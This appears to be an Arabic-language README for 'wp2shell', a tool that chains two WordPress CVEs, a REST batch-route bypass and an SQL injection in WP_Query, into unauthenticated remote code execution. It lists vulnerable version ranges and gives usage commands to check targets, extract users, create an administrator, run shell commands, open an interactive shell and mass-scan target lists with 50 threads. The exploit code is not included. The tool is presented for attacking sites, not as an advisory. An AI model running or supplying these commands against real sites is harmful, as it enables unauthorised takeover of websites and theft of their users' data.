
wp2shell - WordPress RCE & PoC (CVE-2026-63030 + CVE-2026-60137)
تنفيذ أوامر عن بُعد غير مصادق عليه في نواة ووردبريس
بواسطة: JohenLastGen
تقوم هذه الأداة بربط ثغرتين أمنيتين حاسمتين في ووردبريس لتحقيق تنفيذ أوامر عن بُعد غير مصادق:
| الثغرة | CVE | الوصف |
|---|---|---|
| التوجيه الخاطئ للسُبل المجمّعة في REST | CVE-2026-63030 | تجاوز التحقق، تهريب حمولة SQLi |
| حقن SQL عبر author__not_in في WP_Query | CVE-2026-60137 | حقن سلسلة نصية خام → تنفيذ SQL |
التأثير: مهاجم غير مصادق → إنشاء مدير → تنفيذ الأوامر
| نطاق الإصدار | الحالة |
|---|---|
| ووردبريس 6.9.0 - 6.9.4 | ✅ قابل للاختراق (سلسلة RCE كاملة) |
| ووردبريس 7.0.0 - 7.0.1 | ✅ قابل للاختراق (سلسلة RCE كاملة) |
| ووردبريس 6.8.0 - 6.8.5 | ⚠️ حقن SQL فقط (يحتاج إضافة مساعدة) |
| ووردبريس 6.9.5، 7.0.2+ | ❌ مُصحّح |
#خيارات:
-h, --help عرض رسالة المساعدة والخروج
python3 wp2shell.py --help
# 1. التحقق مما إذا كان الهدف قابلًا للاختراق
python3 wp2shell.py check https://target.com
# 2. استخراج البيانات (بصمة/مستخدمين)
python3 wp2shell.py read https://target.com --preset fingerprint
python2 wp2shell.py read https://target.com --preset users
# 3. RCE - إنشاء مدير وتنفيذ أمر (لا حاجة لبيانات اعتماد!)
python3 wp2shell.py shell https://target.com --cmd "id"
# 4. شل تفاعلي
python3 wp2shell.py shell https://target.com --interactive
# 5. مسح جماعي لأهداف متعددة
python3 wp2shell.py scan targets.txt --threads 50 --prove --json results.json